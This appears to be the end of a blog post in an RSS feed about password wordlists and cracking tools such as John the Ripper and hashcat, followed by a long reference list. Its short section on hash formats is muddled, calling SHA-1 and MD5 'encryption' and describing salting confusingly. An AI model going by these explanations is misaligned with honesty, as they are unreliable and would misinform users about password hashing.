&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lh&lt;/span&gt; /usr/share/metasploit-framework/data/wordlists/

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Common Password Formats&lt;/p&gt;

&lt;p&gt;Understanding password security is very important, with various tools transforming passwords in distinct ways. Let's consider the password "R@nT4g*Ne!" (Rent Forgone, in common terms) and observe its transformation through different encryption methods:&lt;/p&gt;

&lt;p&gt;SHA-1:&lt;/p&gt;

&lt;p&gt;Output: 12bf203295c014c580302f4fae101817ec085949&lt;br&gt;
Characteristics: 40 characters, no clear decryption method.&lt;br&gt;
SHA-1 with Salt:&lt;/p&gt;

&lt;p&gt;Output: bc6b79c7716722cb383321e40f31734bce0c3598&lt;br&gt;
Characteristics: Still 40 characters, with the addition of the word "Free."&lt;br&gt;
MD5:&lt;/p&gt;

&lt;p&gt;Output: 4e84f7e8ce5ba8cdfe99d4ff41dc2d41&lt;br&gt;
Characteristics: Encoded into a 128-bit string.&lt;br&gt;
AES (Advanced Encryption Standard):&lt;/p&gt;

&lt;p&gt;Characteristics: Utilizes a symmetric encryption algorithm with variable bit length.&lt;br&gt;
Note: The outcome of AES encryption is highly variable, depending on factors like bit length, making it nearly impossible to predict the final password representation.&lt;br&gt;
In summary, these encryption methods offer different levels of security and characteristics, with varying degrees of complexity and resistance to decryption.&lt;/p&gt;

&lt;h5&gt;
  
  
  References
&lt;/h5&gt;

&lt;p&gt;🔗&lt;a href="https://www.fosslinux.com/48115/kali-linux-wordlist-what-you-need-to-know.htm" rel="noopener noreferrer"&gt;Kali Linux Wordlist: What you need to know&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.kali.org/tools/crunch/" rel="noopener noreferrer"&gt;crunch&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.kali.org/tools/wordlists/" rel="noopener noreferrer"&gt;WordLists - Kali-Tools&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://gitlab.com/kalilinux/packages/wordlists" rel="noopener noreferrer"&gt;WordLists - GitLab - repository&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.kali.org/tools/john/" rel="noopener noreferrer"&gt;John - Kali-Tools .&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://github.com/openwall/john" rel="noopener noreferrer"&gt;Openwall -github repository -John&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://techyrick.com/john-the-ripper-tutorial/" rel="noopener noreferrer"&gt;John-The-Ripper-Tutorial - Techy Rick &lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.openwall.com/john/" rel="noopener noreferrer"&gt;Openwall -John - Offical  Website .&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://hashcat.net/wiki/" rel="noopener noreferrer"&gt;Hash Cat - Wiki&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://hashcat.net/cap2hashcat/" rel="noopener noreferrer"&gt;Cap 2 Hashcat&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://en.wikipedia.org/wiki/Markov_chain" rel="noopener noreferrer"&gt;Markov - Chain&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://hashcat.net/forum/thread-6245.html" rel="noopener noreferrer"&gt;Hash Cat - Forums&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://security.stackexchange.com/questions/260773/hashcat-brute-force-markov-chains" rel="noopener noreferrer"&gt;Security Stack Exchange - Question 260773&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.stationx.net/how-to-use-hashcat/" rel="noopener noreferrer"&gt;StationX - How to use Hashcat&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://charlesreid1.com/wiki/MSF/Wordlists" rel="noopener noreferrer"&gt;MSF/Wordlists - charlesreid&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://docs.metasploit.com/" rel="noopener noreferrer"&gt;MSFConsole&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.stationx.net/how-to-use-hashcat/" rel="noopener noreferrer"&gt;How to use hashcat&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://charlesreid1.com/wiki/MSF/Wordlists" rel="noopener noreferrer"&gt;MSF/Wordlists - charlesreid1&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://unix.stackexchange.com/questions/213628/where-do-the-words-in-usr-share-dict-words-come-from" rel="noopener noreferrer"&gt;Where do the words in /usr/share/dict/words come from?&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="http://wordlist.aspell.net/" rel="noopener noreferrer"&gt;SCOWL (Spell Checker Oriented Word Lists)&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://pubs.opengroup.org/onlinepubs/007908799/xcu/spell.html" rel="noopener noreferrer"&gt;The spell utility -spell - find spelling errors (LEGACY) - UNIX&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.shiksha.com/online-courses/articles/types-of-cryptography/" rel="noopener noreferrer"&gt;What are Different Types of Cryptography?&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cheapsslsecurity.com/p/sha1-vs-sha2-the-technical-difference-explained-by-ssl-experts/" rel="noopener noreferrer"&gt;sha1-vs-sha2-the-technical-difference-explained-by-ssl-experts/&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.okta.com/identity-101/password-encryption/" rel="noopener noreferrer"&gt;password-encryption&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://tldp.org/HOWTO/Secure-Programs-HOWTO/crypto.html" rel="noopener noreferrer"&gt;Secure-Programs&lt;/a&gt;&lt;br&gt;
&lt;a href="https://en.wikipedia.org/wiki/SHA-1" rel="noopener noreferrer"&gt;SHA-1&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.howtogeek.com/44052/htg-explains-what-are-computer-algorithms-and-how-do-they-work/" rel="noopener noreferrer"&gt;What-are-computer-algorithms&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="//ttps://www.howtogeek.com/67241/htg-explains-what-are-md5-sha-1-hashes-and-how-do-i-check-them/"&gt;What Are MD5, SHA-1, and SHA-256 Hashes, and How Do I Check Them? - howtogeek.com&lt;/a&gt;&lt;br&gt;
🔗&lt;a href="https://www.fosslinux.com/48115/kali-linux-wordlist-what-you-need-to-know.htm" rel="noopener noreferrer"&gt;kali-linux-wordlist-what-you-need-to-know&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.kali.org/tools/johnny/" rel="noopener noreferrer"&gt;Johnny&lt;/a&gt;&lt;br&gt;
&lt;a href="https://openwall.info/wiki/john/johnny" rel="noopener noreferrer"&gt;Openwall -info wiki -Johnny&lt;/a&gt;&lt;br&gt;
&lt;a href="https://github.com/openwall/johnny" rel="noopener noreferrer"&gt;Openwall -github repository -Johnny&lt;/a&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>security</category>
      <category>password</category>
      <category>webdev</category>
    </item>
  </channel>
</rss>
